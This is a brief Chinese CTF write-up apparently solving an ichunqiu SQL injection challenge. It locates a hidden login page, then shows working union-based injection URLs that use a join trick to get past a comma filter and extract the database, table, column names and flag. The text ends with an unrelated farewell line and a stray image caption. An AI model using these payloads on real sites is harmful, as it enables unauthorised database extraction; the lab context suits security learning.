先掃背景發現 兩個可疑登入界面 l0gin.php login.php 猜測是第一個 用bp 抓包發現 index.php 中間有302 重定向 頭檔案 裡面有一個 page=l0gin.php 應該是他了 暗示的很明确了
顯示 1 flag 先手動把 習慣手動sql注入
先判斷 是數字型還是字元型 1' %23 看出不來 直接 union select 1,2 %23
ok
2被截斷了 說明,存在被截斷 而且直接是輸出了字元串 猜測字元型 竟然 , 不能用 可以join 連接配接select
union select * from select 1 join select 2 %23 成功回顯 按照這個直接擷取庫名表名
http://0b13d33141d8423190cc7e6ffa99f606004adef93cd4475a.changame.ichunqiu.com/l0gin.php?id=0' union select * from (select database()) a join (select null) b%23
擷取庫 sqli
http://0b13d33141d8423190cc7e6ffa99f606004adef93cd4475a.changame.ichunqiu.com/l0gin.php?id=0' union select * from (select table_name from information_schema.tables where table_schema='sqli') a join (select null) b%23
擷取表 users
http://0b13d33141d8423190cc7e6ffa99f606004adef93cd4475a.changame.ichunqiu.com/l0gin.php?id=0' union select * from (select group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='users') a join (select null) b%23
擷取字段
id username
id,username,flag_9c861b688330 null
ok 發現了
http://0b13d33141d8423190cc7e6ffa99f606004adef93cd4475a.changame.ichunqiu.com/l0gin.php?id=0' union select * from (select flag_9c861b688330 from users) a join (select null) b%23
得到結果
id username
flag{7176716c-1d16-474c-8660-33faaf8bc43e} null
從此山高路遠,縱馬揚鞭。願往後旅途,三冬暖,春不寒,天黑有燈,下雨有傘。此生盡興,不負勇往。
![mac歌曲傳到iphone_如何在iPhone,iPad,Mac或Apple TV上檢視歌曲歌詞[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)